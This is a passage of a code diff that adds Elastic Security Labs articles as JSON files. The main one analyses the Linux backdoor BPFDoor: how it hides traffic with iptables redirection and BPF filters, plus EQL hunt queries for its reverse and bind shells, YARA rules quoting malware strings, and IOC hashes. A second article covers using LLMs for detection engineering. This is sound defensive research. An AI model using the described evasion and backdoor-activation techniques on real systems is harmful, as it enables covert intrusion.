iptables forwards those packets to the listening socket owned by the implant. . This establishes the communication channel between attacker and implant that will be used for command and control. The implant then covers its tracks by removing the iptables firewall rules that redirected the traffic.\n\nDespite the firewall rule being removed, traffic on the legitimate port will continue to be forwarded to the implant due to how Linux statefully tracks connections. No visible traffic will be addressed to the implant port (although it will be delivered there).\n\n\n\n## BPF Filters\n\nAs stated in step 9 (above), [BPF](https://www.kernel.org/doc/html/v5.12/networking/filter.html) or Berkeley Packet Filters is a technology from the early ’90s that allows a user-space program to attach a network filter onto any socket and allow or disallow certain types of data to come through the socket. These filters are made up of bytecode that runs on an abstract virtual machine in the Linux kernel. The BPF virtual machine has functionality to inspect all parts of incoming packets and make an allow/drop decision based on what it sees. . You can see in the image example below what this looks like within the BPFDoor source code:\n\n\n\nWe took this BPF code, converted it, and wrote it up as pseudo code in an effort to aid our research and craft packets able to successfully get through these filters in order to activate the backdoor.\n\n\n\nThe above capabilities allow BPFDoor to attach a filter onto any socket and allow or disallow certain types of data to come through the socket - used carefully by the adversary to invoke a series of different functions within the payload.\n\n## Historical Analysis\n\nWe wanted to see over time, between BPFDoor payloads, what, if anything, the threat actors modified. A number of samples were detonated and analyzed ranging from the uploaded source code to a [sample](https://www.virustotal.com/gui/file/599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683/detection) uploaded last month. We found that the behavior over time did not change a great deal. It maintained the same relative attack lifecycle with a few variations with the hardcoded values such as passwords, process names, and files - this is not uncommon when compared to other malware samples that look to evade detection or leverage payloads across a variety of victims.\n\nWe posture that the threat group would change passwords and update process or file names in an effort to improve operational security and remain hidden. It also makes sense that the general functionality of the backdoor would not change in any great way. As the saying goes “If it’s not broken, don’t fix it”. Our malware analysis and reverse engineering team compared the source code (uploaded to [VirusTotal](https://www.virustotal.com/gui/file/8b9db0bc9152628bdacc32dab01590211bee9f27d58e0f66f6a1e26aea7552a6/detection) and found on [Pastebin](https://pastebin.com/raw/kmmJuuQP)) to a recently uploaded sample highlighting some of the notable changes within the main function of the malware in the images below.\n\n\n\nAs we mentioned earlier, one recent [sample](https://www.virustotal.com/gui/file/07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d/detection) we have come across that does not seem to exhibit some of the tactics of prior payloads has been observed - It doesn’t alter its initial name to a hardcoded value and simply executes from its placed location, otherwise, it models relatively the same behavior.\n\n## Linux Malware Sophistication\n\nA trend we have had the privilege of observing at Elastic, is the threat landscape of Linux targeted attacks - these being focused often on cloud workloads, or systems that typically have less observational technology configured in many of the environments we see. The trend of complex, well-designed payloads is something that is often simply overlooked, and specifically in the case of BPFDoor, remained hidden for years.\n\nIt is important to consider these workloads a critical component of your security posture: A lack of visibility within cloud workloads will eventually lead to large gaps in security controls - adversarial groups are further growing to understand these trends, and act accordingly. Best practices state that endpoint defenses should be consistent across the fleet of systems under management, and conform to a least privilege architecture.\n\n## Detection of BPFDoor\n\nAfter researching this malware it became apparent as to why the backdoor remained in use and hidden for so long. If you aren’t intimately familiar with Linux process abnormalities or weren’t looking for it you would generally not detect it. Even though it takes advantage of Linux capabilities in a stealthy manner to evade detection, there are still opportunities for both behavioral and signature-based detections.\n\nThe first area of opportunity we witnessed while testing was the behavior we observed during the initial execution of the malware, specifically its working directory, in a shared memory location /dev/shm. This is a native temporary filesystem location in Linux that uses RAM for storage, and a binary executing from it let alone generating network connections is fairly uncommon in practice.\n\nDuring execution, BPFDoor removes existing files from /dev/shm and copies itself there prior to initialization. A detection for this would be any execution of a binary from this directory as root (you have to be root to write to and read from this directory).\n\nThis was verified by detonating the binary in a VM while our Elastic Agent was installed and observing the sequence of events. You can see an image of this detection on the Kibana Security Alerts page below. This rule is publicly available as an Elastic SIEM detection rule - [Binary Executed from Shared Memory Directory](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_process_started_in_shared_memory_directory.toml):\n\n\n\nThe second opportunity we noticed, for detection, was a specific PID file being created in /var/run. We noticed the dropped PID file was completely empty while doing a quick query via the [Osquery integration](https://docs.elastic.co/en/integrations/osquery_manager) to the /var/run directory. While this is not inherently malicious, it is unusual for the file size of a PID to be 0 or above 10 bytes and thus we created an additional rule centered around detecting this unusual behavior.\n\nOur [Abnormal Process ID or Lock File Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_abnormal_process_id_file_created.toml) rule identifies the creation of a PID file in the main directory of /var/run with no subdirectory, ignoring common PID files to be expected:\n\n\n\nThe third area we wanted to look at was the network connections tied to two of the three capabilities (reverse shell and bind shell) the backdoor possesses. We wanted to see if there were any suspicious network connections tied to process or user abnormalities we could sequence together based off of the way BPFDoor handles establishing a reverse or bind shell.\n\nThe reverse shell was the first capability focused on. Taking a deep look at the process tree in and around the reverse shell establishment allowed us to key in on what would be considered a strange or even abnormal sequence of events leading to and involving an outbound network connection.\n\nWe developed a hunt rule sequence that identifies an outbound network connection attempt followed by a session id change as the root user by the same process entity. The reason we developed these network focused hunt rules is due to possible performance issues caused if running these continually.\n\nThe bind shell was the last capability we honed in on. Identifying an abnormal sequence of events surrounding the bind shell connection was difficult due to the way it forks then accepts the connection and kills the accepting process post established connection. Therefore we had to focus on the sequence of events within the process entity id directly involving the network connection and subsequent killing of the accepting process.\n\nAfter developing the 2 detection rules along with the 2 hunt rules listed below and in addition to the 6 YARA signatures deployed we were able to detect BPFDoor in a myriad of different ways and within different stages of its life cycle. As stated earlier though, if you detect this malware in your environment it should be the least of your concerns given the threat actor will most likely have already successfully compromised your network via other means.\n\n\n\n### Existing Detection Rules\n\nThe following Elastic Detection Rules will identify BPFDoor activity:\n\n- [Abnormal Process ID or Lock File Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_abnormal_process_id_file_created.toml)\n- [Binary Executed from Shared Memory Directory](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_process_started_in_shared_memory_directory.toml)\n\n### Hunting Queries\n\nThis EQL rule can be used to successfully identify BPFDoor reverse shell connections having been established within your environment:\n\n**EQL BPFDoor reverse shell hunt query**\n\n```\nsequence by process.entity_id with maxspan=1m\n[network where event.type == \"start\" and event.action == \"connection_attempted\" and user.id == \"0\" and not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\")]\n[process where event.action == \"session_id_change\" and user.id == \"0\"]\n```\n\n\n\nThe hunt rule we created here identifies a sequence of events beginning with a session id change, followed by a network connection accepted, in correlation with ptmx file creation and a deletion of the process responsible for accepting the network connection. This EQL rule can be used to successfully identify BPFDoor bind shell connections within your environment:\n\n**EQL BPFDoor bind shell hunt query**\n\n```\nsequence by process.entity_id with maxspan=1m\n[process where event.type == \"change\" and event.action == \"session_id_change\" and user.id == 0 and not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\")]\n[network where event.type == \"start\" and event.action == \"connection_accepted\" and user.id == 0]\n[file where event.action == \"creation\" and user.id == 0 and file.path == \"/dev/ptmx\"]\n[process where event.action == \"end\" and user.id == 0 and not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\")]\n```\n\n\n\n### YARA Rules\n\nIn addition to behavioral detection rules in the Elastic Endpoint, we are releasing a set of BPFDoor Yara signatures for the community.\n\n**BPFDoor YARA rule**\n\n```\nrule Linux_Trojan_BPFDoor_1 {\n\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"144526d30ae747982079d5d340d1ff116a7963aba2e3ed589e7ebc297ba0c1b3\"\n strings:\n $a1 = \"hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event\" ascii fullword\n $a2 = \"/sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d\" ascii fullword\n $a3 = \"avahi-daemon: chroot helper\" ascii fullword\n $a4 = \"/sbin/mingetty /dev/tty6\" ascii fullword\n $a5 = \"ttcompat\" ascii fullword\n condition:\n all of them\n}\n\nrule Linux_Trojan_BPFDoor_2 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"3a1b174f0c19c28f71e1babde01982c56d38d3672ea14d47c35ae3062e49b155\"\n strings:\n $a1 = \"hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event\" ascii fullword\n $a2 = \"/sbin/mingetty /dev/tty7\" ascii fullword\n $a3 = \"pickup -l -t fifo -u\" ascii fullword\n $a4 = \"kdmtmpflush\" ascii fullword\n $a5 = \"avahi-daemon: chroot helper\" ascii fullword\n $a6 = \"/sbin/auditd -n\" ascii fullword\n condition:\n all of them\n}\n\nrule Linux_Trojan_BPFDoor_3 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78\"\n strings:\n $a1 = \"[-] Spawn shell failed.\" ascii fullword\n $a2 = \"[+] Packet Successfuly Sending %d Size.\" ascii fullword\n $a3 = \"[+] Monitor packet send.\" ascii fullword\n $a4 = \"[+] Using port %d\"\n $a5 = \"decrypt_ctx\" ascii fullword\n $a6 = \"getshell\" ascii fullword\n $a7 = \"getpassw\" ascii fullword\n $a8 = \"export %s=%s\" ascii fullword\n condition:\n all of them\n}\n\nrule Linux_Trojan_BPFDoor_4 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78\"\n strings:\n $a1 = { 45 D8 0F B6 10 0F B6 45 FF 48 03 45 F0 0F B6 00 8D 04 02 00 }\n condition:\n all of them\n}\n\nrule Linux_Trojan_BPFDoor_5 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925\"\n strings:\n $a1 = \"getshell\" ascii fullword\n $a2 = \"/sbin/agetty --noclear tty1 linux\" ascii fullword\n $a3 = \"packet_loop\" ascii fullword\n $a4 = \"godpid\" ascii fullword\n $a5 = \"ttcompat\" ascii fullword\n $a6 = \"decrypt_ctx\" ascii fullword\n $a7 = \"rc4_init\" ascii fullword\n $b1 = { D0 48 89 45 F8 48 8B 45 F8 0F B6 40 0C C0 E8 04 0F B6 C0 C1 }\n condition:\n all of ($a*) or 1 of ($b*)\n}\n\nrule Linux_Trojan_BPFDoor_6 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"dc8346bf443b7b453f062740d8ae8d8d7ce879672810f4296158f90359dcae3a\"\n strings:\n $a1 = \"getpassw\" ascii fullword\n $a2 = \"(udp[8:2]=0x7255) or (icmp[8:2]=0x7255) or (tcp[((tcp[12]&0xf0)>>2):2]=0x5293)\" ascii fullword\n $a3 = \"/var/run/haldrund.pid\" ascii fullword\n $a4 = \"Couldn't install filter %s: %s\" ascii fullword\n $a5 = \"godpid\" ascii fullword\n condition:\n all of them\n}\n```\n\n## Interacting with BPFDoor\n\nThe Elastic Security Team has released several tools that can aid in further research regarding BPFDoor to include a network scanner used to identify infected hosts, a BPFDoor malware configuration extractor, and a BPFDoor client binary that can be used to actively interact with a sample.\n\n### BPFDoor Scanner\n\nThe Elastic Security Team [has released](https://www.elastic.co/security-labs/bpfdoor-scanner) a Python script that can identify if you have BPFDoor infected hosts.\n\nThe scanner sends a packet to a defined IP address using the default target port (68/UDP)and default interface. It listens to return traffic on port 53/UDP.\n\n\n\n### BPFDoor Configuration Extractor\n\nThis tool will allow you to extract configurations from any BPFDoor malware you may have collected. This will allow you to develop additional signatures and further analysis of the malware as well as your environment.\n\nThe BPFDoor configuration extractor can be downloaded [here](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor).\n\n\n\n### BPFDoor Client POC\n\nQuickly after beginning our research into this malware we realized we would also need to actively interact with BPFDoor in order to observe the full extent of the capabilities that it possesses and monitor what these capabilities would look like from a host and SIEM level.\n\nIn order to do this, we had to break down the BPF filters in the BPFDoor source code so we could craft packets for the different protocols. To do this, we used [Scapy](https://scapy.net/), a packet manipulation program, to ensure we could pass the filters for the purpose of activating the backdoor. Once we ensured we could pass the filters, Rhys Rustad-Elliott, an engineer at Elastic built a BPFDoor client that accepts a password, IP address, and port allowing you to connect to a BPFDoor sample and interact if you possess the sample’s hardcoded passwords.\n\nDepending on the password or lack of password provided, BPFDoor will behave exactly the same way it would in the wild. You can invoke a reverse shell, establish a bind shell, or connect to it with no supplied password to receive a ping-back confirming its installation.\n\n\n\nResearchers looking to use BPFDoor can [reach out to Elastic Security](mailto:threat-notification@elastic.co) for access to the BPFDoor client POC. Please note that these tools will be shared at our discretion with those in the trusted security community looking to improve the detection of this vulnerability.\n\n## Impact\n\nThe following MITRE ATT&CK Tactic, Techniques, and Sub-techniques have been observed with the BPFDoor malware.\n\n### Tactics\n\nTactics represent the “why” of an ATT&CK technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Execution](https://attack.mitre.org/tactics/TA0002/)\n\n### Techniques (sub-techniques)\n\nTechniques (and sub-techniques) represent ‘how’ an adversary achieves a tactical goal by performing an action.\n\n- [Native API](https://attack.mitre.org/techniques/T1106/)\n- [External Remote Services](https://attack.mitre.org/techniques/T1133/)\n- [Hide Artifacts](https://attack.mitre.org/techniques/T1564/)\n- [Indicator Removal on Host](https://attack.mitre.org/techniques/T1070/)\n- [Non-Application Layer Protocol](https://attack.mitre.org/techniques/T1095/)\n- [Command and Scripting Interpreter: Unix Shell](https://attack.mitre.org/techniques/T1059/004)\n- [Abuse Elevation Control Mechanism: Setuid and Setgid](https://attack.mitre.org/techniques/T1548/001/)\n\n## Source Pseudocode\n\nTo clearly articulate the details of this malware, we’ve created [two diagrams](https://www.elastic.co/pdf/bpfdoor_pseudocode.pdf) that outline the specific pseudocode for BPFDoor based on the source code uploaded to VT and found on Pastebin. While this contains a lot of detail, it is simple to understand if researchers choose to further this research.\n\n## Summary\n\nWhile threat groups continue to increase in maturity, we expect this kind of mature, well designed and hidden threat will continue to be found within Linux environments. These kinds of findings reiterate the importance of comprehensive security controls across the entirety of a fleet, rather than simply focusing on user endpoints.\n\nBPFDoor demonstrates a perfect example of how important monitoring workloads within Linux environments can be. Payloads such as this are near-on impossible to observe and detect without sufficient controls, and should be considered a moving trend within the general adversarial landscape.\n\n## Observables\n\n| Observable | Type | Reference | Note |\n| ---------------------------------------------------------------- | ------------ | -------------------- | -------------------------------- |\n| /dev/shm/kdmtmpflush | process name | BPFDoor process name | Observed process name of BPFDoor |\n| /var/run/haldrund.pid | file name | BPFDoor file name | Observed BPFDoor PID file |\n| /var/run/kdevrund.pid | file name | BPFDoor file name | Observed BPFDoor PID file |\n| /var/run/xinetd.lock | file name | BPFDoor file name | Observed BPFDoor lock file |\n| 74ef6cc38f5a1a80148752b63c117e6846984debd2af806c65887195a8eccc56 | SHA-256 | BPFDoor malware | |\n| 07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d | SHA-256 | BPFDoor malware | |\n| 76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925 | SHA-256 | BPFDoor malware | |\n| 93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c | SHA-256 | BPFDoor malware | |\n| 96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9 | SHA-256 | BPFDoor malware | |\n| 599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683 | SHA-256 | BPFDoor malware | |\n| 2e0aa3da45a0360d051359e1a038beff8551b957698f21756cfc6ed5539e4bdb | SHA-256 | BPFDoor malware | |\n| f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72 | SHA-256 | BPFDoor malware | |\n| fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a | SHA-256 | BPFDoor malware | |\n| 5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3 | SHA-256 | BPFDoor malware | |\n| f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27 | SHA-256 | BPFDoor malware | |\n| 5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9 | SHA-256 | BPFDoor malware | |\n| 97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc | SHA-256 | BPFDoor malware | |\n| c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c | SHA-256 | BPFDoor malware | |\n| 4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d | SHA-256 | BPFDoor malware | |\n\n## References\n\n- https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896\n- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf\n- https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt294e7cd5c4b8a050/628e88d93b9b8554904a703c/bpfdoor-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "A peek behind the BPFDoor",
+ "slug": "a-peek-behind-the-bpfdoor",
+ "date": "2022-07-13",
+ "description": "In this research piece, we explore BPFDoor — a backdoor payload specifically crafted for Linux in order to gain re-entry into a previously or actively compromised target environment.",
+ "author": [
+ {
+ "slug": "jake-king"
+ },
+ {
+ "slug": "colson-wilhoit"
+ }
+ ],
+ "image": "blog-security-detection-720x420.png",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ]
+ },
+ "id": "security_labs_content-a_peek_behind_the_bpfdoor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-accelerating_elastic_detection_tradecraft_with_llms-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-accelerating_elastic_detection_tradecraft_with_llms-md.json
new file mode 100644
index 00000000000..fa8086531ff
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-accelerating_elastic_detection_tradecraft_with_llms-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Accelerating Elastic detection tradecraft with LLMs\"\nslug: \"accelerating-elastic-detection-tradecraft-with-llms\"\ndate: \"2023-09-29\"\ndescription: \"Learn more about how Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities.\"\nauthor:\n - slug: mika-ayenson\n - slug: jess-daubner\nimage: \"photo-edited-09@2x.jpg\"\ncategory:\n - slug: detection-science\n - slug: machine-learning\n - slug: generative-ai\n---\n\nIn line with our [Openness Initiative](https://www.elastic.co/blog/continued-leadership-in-open-and-transparent-security), we remain committed to transparency and want to share how our internal AI R&D efforts have increased the productivity of our threat detection team. For the past few months, Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities. \n\n## The ONWeek Exploration Odyssey\n\nAt Elastic, outside of our long-running [Space, Time](https://www.elastic.co/about/our-source-code) tradition, we dedicate a week every 6 months to work either independently or in a team on something we call ONWeek. This is a week where we all step away from feature work, tech debt, and other similar tasks; and use the week to focus on innovative ideas, active learning opportunities, applied research, and proof of concept work. During the previous ONWeek in May, we explored ideas to leverage large language models (LLMs) with Elastic’s existing features to enhance security alert triaging and productivity for tier 1 analysts and on, internal productivity workflows, and understanding the foundational building blocks for our experimentation and tuning. Figure 1 shows several different opportunities for research we have, which involve ingesting events, passing data through tailored prompts, and generating different classes of content designed for different Elastic workflows. \n\n\nFigure 1: GenAI Security Use Cases\n\nFundamentally we explored several traditional ML approaches, but ultimately focused on starting simple and gradually increasing complexity, while keeping in mind these tools and concepts:\n - **Start Simple** - A mantra that guided our approach.\n - **Azure OpenAI** - Access to the GPT-4 LLM\n - **Prompt Engineering** - Developing tailored instructions for the LLM.\n - **LangChain** - Python library to help craft LLM applications.\n\nOne of our goals is to streamline Elastic’s detection engineer workflows, allowing for greater focus on better detections while showcasing the depth and nuances of our query languages. On the way there, we’re spending time experimenting to validate our prompts and prepare them for operational use. We want to make sure that as we iterate over our prompts, we don’t incidentally introduce regressions. As AI advancements emerge, we intend for our T&E to ensure that any adjustments, be it fine-tuning, model replacements, or prompt modifications, are deliberate. Ultimately, we aspire for our analysts to seamlessly utilize the latest AIML features, applying the most suitable prompts or ML techniques in the right context.\n\nWith these goals in mind, our first research use case in May focused on query generation. We learned quickly that with minimal data and prompt engineering, we could chain a series of prompts to transform raw Elastic events into EQL queries. \n\n\nFigure 2: Query Generation POC\n\nFor experimentation purposes, we simulated suspicious activity using our [Red Team Automation (RTA)](https://github.com/elastic/detection-rules/tree/main/rta) scripts and captured the endpoint activity in the SIEM through the Elastic Agent. Figure 2 displays sample events from the Elastic stack, exported to gold.json test files, that included the essential event fields for query generation. \n\nWe then asked GPT to analyze the event collection covering the RTA execution time window and focus on events with suspicious behavior. In our POC, the prompt asked us to pinpoint key values linked to potential anomalies. We then followed with subsequent prompts to chunk the events and summarize all of the activity. Based on all the summaries, we asked GPT to generate a list of indicators, without keying on specific values. With this short list of suspicious behaviors, we then asked GPT to generate the query. A significant advantage of our long-term open-source development is that GPT-related models are familiar with Elastic content, and so we benefited by not having to overfit our prompts.\n\nEven though going from raw data to an EQL query was conceptually straightforward, we still encountered minor hiccups like service availability with Azure OpenAI. It was relatively cheap, in what we estimated cost us around $160 in a week to use the OpenAI and Azure OpenAI inference and embedding APIs. We also explored using the GCP Vertex AI Workbench to facilitate collaborative work on Jupyter notebooks, but the complexity of using the available open source (OSS) models made them challenging to use during the short ONWeek.\n\n\nFigure 3: May 2023 ONWeek Major Outcomes\n\nWe used ONWeek to mature our roadmap like expanding beyond in-memory, library-based vector search implementations to more performant, scalable, and production-ready data stores of our detection-rules content in Elasticsearch. Based on our initial results, we understood the potential and viability of integrating GenAI into the analyst workflow (e.g. allowing event time-window selection, query generation, and timeline addition). Based on these early wins, we put on our internal roadmap plans to pursue further LLM R&D and decided to tackle one of our internal productivity workflows.\n\n## A New Horizon: Generating Investigation Guides\n\nOver the years, Elastic Security Labs has matured its content. Starting in 2020 by adding the Investigation Guide Security feature, then standardizing those guides in 2021. By 2023, with over 900 [rules](https://github.com/elastic/detection-rules/tree/main/rules) in place, we are actively seeking an efficient way to generate highly accurate, detailed, and standardized guides for all 900+ pre-built rules.\n\nMelding traditional ML approaches (like similarity vector search) with our prompt engineering special sauce, our team created a new prototype centered around investigation guide generation called Rulecraft. Now, with just a rule ID in hand, our rule authors can generate a baseline investigation guide solution in mere minutes! \n\n\nFigure 4: Sample Investigation Guide\n\nIn this initial exploration, we supplied detection rules, but limited input to a few fields from the rules like the description and name of GPT. We also attempted to supply the query, but it appeared to overfit the expected outcome we desired. Initially, we provided a simple prompt with these fields to evaluate how well GPT could generate a decent investigation guide with minimal effort. As we explored further, it became evident that we could benefit from chaining multiple prompts akin to what we did during the EQL query generation experiment. So we spent time creating prompts tailored to distinct sections of the investigation guide. Segmenting the prompts not only granted us greater flexibility but also addressed areas where GPT faltered, such as the \"Related Rules\" section, where GPT tended to hallucinate most. At times like this, we used traditional ML methods like similarity search and integrated our rules into a vector database for enhanced context.\n\nNext, we identified opportunities to inject additional context into specific sections. To ensure uniformity across our guides, we curated a library of approved content and language for each segment. This library then guided GPT in generating and formatting responses similar to our established standard messages. We then compared GenAI-produced guides with their manually crafted counterparts to identify other formatting discrepancies, general errors introduced by GPT, and even broader issues with our prompts. \n\nBased on these findings, we chose to improve our generated content by adjusting the prompts instead of using post-processing techniques like string formatting. While the automated investigation guides aren't perfect, they offer our detection engineers a solid starting place. In the past, investigation guides have enhanced our PR peer review process by providing the reviewer with more context as the rules expected behavior. We now can generate the base guide, tune it, and add more detail as needed by the detection engineer instead of starting from scratch. \n\nTo bring this capability directly to our detection engineers, we integrated Rulecraft into a GitHub action workflow, so they can generate guides on-demand. We also produced the additional 650+ guides in a mere 13 hours—a task that would traditionally span months. The automation allows us to make small tweaks and quickly regenerate base content for rules missing investigation guides. Again, these guides are still subject to our stringent internal review, but the time and effort saved by leveraging GenAI for our preliminary drafts is incredible. \n\n## Charting the Future: Next Steps \n\nOur research and development journey continues, with a central focus on refining our approach to content generation with LLMs and more thoroughly validating our results. Here’s a short list of our priorities now that we’ve explored the viability and efficacy of integrating LLMs into our detection engineering workflow: \n - Compare proprietary models with the latest open-source models\n - Further refine our experimentation process including event filtering, prompt optimization, and exploring various model parameters\n - Create a test suite to validate our results and prevent regressions.\n - Seamlessly integrate our R&D advancements into the [Elastic AI Assistant](https://www.elastic.co/blog/open-security-impact-elastic-ai-assistant).\n\nOverall, we want to dramatically increase our investigation guide coverage and reduce the time taken to craft these guides from the ground up. Each investigation guide provides analysts with detailed, step-by-step instructions and queries for triaging alerts. With a customer-first mentality at the forefront of our [source code](https://www.elastic.co/about/our-source-code), we aim to elevate the analyst experience with more investigation guides of even higher quality, translating into less time spent by our customers on FP analysis and alert triaging.\n\n## Summary\nKeeping in spirit with our open innovation and transparency, Elastic Security Labs has begun our generative AI voyage to enhance the productivity of our threat detection processes. Our efforts continue to evolve and incorporate prompt engineering and traditional ML approaches on a case-by-case basis, resulting in more R&D proof-of-concepts like “LetmeaskGPT” and \"Rulecraft\". The latter POC has significantly reduced the time required to craft baseline guides, improve the analyst experience, and reduce false positive analyses. There’s so much more to do and we want to include you on our journey! While we've made strides, our next steps include further refinement, developing a framework to rigorously validate our results, and exploring opportunities to operationalize our R&D, ensuring we remain at the forefront of security advancements. \n\nWe’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!\n\nAlso, feel free to check out these additional resources to learn more about how we’re bringing the latest AI capabilities to the hands of the analyst: \n - Learn how to responsibly use [ChatGPT with Elasticsearch](https://www.elastic.co/blog/chatgpt-elasticsearch-openai-meets-private-data)\n - See the new Elastic [AI Assistant](https://www.elastic.co/blog/introducing-elastic-ai-assistant) — the open, generative AI sidekick powered by ESRE and [get setup](https://www.elastic.co/guide/en/security/current/security-assistant.html#set-up-ai-assistant)\n"
+ },
+ "title": "Accelerating Elastic detection tradecraft with LLMs",
+ "slug": "accelerating-elastic-detection-tradecraft-with-llms",
+ "date": "2023-09-29",
+ "description": "Learn more about how Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities.",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ },
+ {
+ "slug": "jess-daubner"
+ }
+ ],
+ "image": "photo-edited-09@2x.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ },
+ {
+ "slug": "machine-learning"
+ },
+ {
+ "slug": "generative-ai"
+ }
+ ]
+ },
+ "id": "security_labs_content-accelerating_elastic_detection_tradecraft_with_llms-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-advanced_techniques_used_in_malaysian_focused_apt_campaign-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-advanced_techniques_used_in_malaysian_focused_apt_campaign-md.json
new file mode 100644
index 00000000000..50e34b3fc85
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-advanced_techniques_used_in_malaysian_focused_apt_campaign-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
